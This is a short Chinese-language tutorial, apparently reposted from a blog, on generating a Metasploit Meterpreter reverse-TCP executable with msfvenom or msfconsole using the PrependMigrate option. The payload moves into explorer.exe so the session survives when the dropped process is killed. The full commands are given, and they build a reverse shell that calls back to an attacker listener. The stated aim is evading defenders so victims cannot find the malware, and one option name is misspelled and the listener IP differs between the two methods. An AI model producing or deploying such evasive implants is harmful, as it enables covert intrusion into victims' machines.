Metasploit渗透——msfvenom隐藏恶意进程
Posted Thgilil
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Metasploit渗透——msfvenom隐藏恶意进程相关的知识,希望对你有一定的参考价值。
我们上传了msf马后并不是万无一失的,msf马创建的进程极有可能被防御设备发现,发出警报并采取措施终止进程,我们的会话也会被终止。因此,我们有必要将创建的msf马进程迁移到目标及正在运行的进程中,这样受害者就无法找到恶意进程,从而定位到恶意软件的位置了。
第一种方法
通过使用 PrependMigrate参数使生成的可执行文件隐藏在名为explorer.exe的进程后面。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 prpendmigrateprocess=explorer.exe prependmigrate=true -f exe > shell.exe
加载msfconsole的exploit/multi/handler进行监听
使用如下命令查找shell.exe
ps | grep shell.exe
查找到shell.exe的进程是3660,直接杀死此进程
kill 3660
杀掉进程3660后,可以发现,我们的meterpreter会话并没有关闭,原因是因为PrependMigrate将我们的shell.exe隐藏在了explorer.exe中
第二种方法
使用Msfconsole创建可隐藏的二进制执行文件
use windows/meterpreter/reverse_tcp
set lhost 102.168.0.109
set lport 4444
set prependmigrate true
set prependmigrateprocess explorer.exe
generate -f exe -o shell2.exe
使用以上命令可以创建和msfvenom相同的文件,后续利用和第一种方法相同。
以上是关于Metasploit渗透——msfvenom隐藏恶意进程的主要内容,如果未能解决你的问题,请参考以下文章
Metasploit渗透——msfvenom生成shell速查